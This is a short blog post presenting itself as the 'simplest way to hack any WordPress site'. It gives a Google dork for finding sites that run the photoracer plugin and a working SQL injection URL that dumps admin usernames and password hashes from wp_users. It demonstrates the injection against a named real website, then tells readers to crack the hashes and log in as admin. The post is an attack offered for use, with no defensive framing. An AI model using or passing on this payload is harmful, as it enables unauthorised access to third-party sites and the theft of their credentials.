Simplest way to hack any Wordpress based site | Convex Coders

Thursday, 12 January 2012

Simplest way to hack any Wordpress based site

Posted by Convex Coders at 15:40 Comments

In this post I'll tell you the SIMPLEST WAY TO HACK ANY WORDPRESS BASED SITE.

First we'll use this dork to search website with the help of Google

inurl:"wp-content/plugins/photoracer/viewimg.php?id="

Results:

I'm now gonna test one of them..

For eg..

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2

Now add the Exploit..

/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

This is the exploit.. (GIVEN ABOVE)

And now the site address will become..

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

Now you can see the ADMIN and PASS....just crack the HASHES and you're done..

Site Admin Login page for WP

http://www.SITE-ADDRESS/wp-login.php

Subscribe to: Post Comments (Atom)

Recent
Popular
Label

Convex Coders © 2011 Convex-Coders. Supported by Code 104 and tech PANELS